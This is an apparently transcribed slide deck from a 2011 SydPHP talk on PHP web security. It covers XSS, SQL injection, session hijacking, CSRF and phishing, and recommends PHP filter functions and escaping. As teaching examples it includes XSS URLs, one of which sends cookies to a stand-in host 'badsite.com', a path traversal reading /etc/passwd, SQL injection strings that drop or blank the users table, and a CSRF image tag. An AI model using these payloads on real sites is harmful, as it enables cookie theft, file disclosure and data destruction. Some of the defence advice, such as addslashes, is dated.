sydphp security in php
DESCRIPTION
Security in PHP talk for SydPHP, Thursday 24th February, 2011TRANSCRIPT
Security and PHP
February 2011
Allan Shone
Technical Yahoo!, Local Paranoid @Yahoo!7
Been at Yahoo!7 just under 3 years
Website Security
February 2011
What is Security?
Why is Security important?
What can you do about it?
Types of issues
XSS
SQL Injection
Session Hijacking
CSRF
Phishing
Why XSS?
February 2011
Lead to larger problems
Used to inject code into your site
Bad people ™ can steal user information
http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ealert%280%29;%3C/script%3E
http://sydphp.leetbix.com/template.php?load=%3Cscript%3Edocument.location=%27http://badsite.com%27%3C/script%3E
http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ea%3Ddocument.createElement(%22img%22)%3Ba.src%3D%22http%3A%2F%2Fbadsite.com%2F%3F%22%2Bdocument.cookie%3Bdocument.firstChild.appendChild(a)%3B%3C%2Fscript%3E
February 2011
February 2011
http://sydphp.leetbix.com/template.php?load=/etc/passwd%00
http://sydphp.leetbix.com/template.php?load=../some-config.conf%00
February 2011
POST too
February 2011
What do I do?!
February 2011
Filter
Simplest solution: htmlentities()
February 2011
SQL what?
February 2011
Arbitrary SQL code being executed
Bypass login, edit database content
Find passwords, hidden information
http://sydphp.leetbix.com/login.php
Password: ‘ OR 1=1 -- ‘
‘ OR 1=1; DROP TABLE users; -- ‘
‘ OR 1=1; UPDATE TABLE users SET password=‘’ WHERE 1=1; -- ‘
February 2011
Oh no!
February 2011
http://xkcd.com/327/
February 2011
escape
February 2011
mysql_real_escape_string()
addslashes()
PDO
PDO::quote()
Session hijacking
February 2011
Bad for users
Bad for data integrity
Easy to prevent
Not stand-alone
February 2011
Cookies
February 2011
Integrity checking
February 2011
CSRF? Sugar?
February 2011
Cross-site request forgery
February 2011
Simple, but un-common
February 2011
<img src=“http://othersite.com/changepasswd?new=onlyIKnow” />
<script>a=document.createElement(‘img’);a.src=‘http://badsite../’;document.firstChild.appendChild(a);a.src=‘http://badsite.com/otherpage’;</script>
February 2011
Integrity, integrity
February 2011
Phishing!
February 2011
Same, but different?
February 2011
But what can you do
February 2011
PHP’s filter functions
February 2011
filter_has_var
filter_id
filter_input_array
filter_input
filter_list
filter_var_array
filter_var
No more SuperGlobals
February 2011
$search = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);
echo ”<h3>No results found for ‘{$search}’.</h3>";
echo "<a href='?search=$search&page=2'>Next page</a>";
February 2011
INPUT_GET
INPUT_POST
INPUT_COOKIE
INPUT_SERVER
INPUT_ENV
February 2011
Allan Shone - @cerealboyJared Mooring - @jadzor
Filter function filters: http://au2.php.net/manual/en/filter.filters.php
February 2011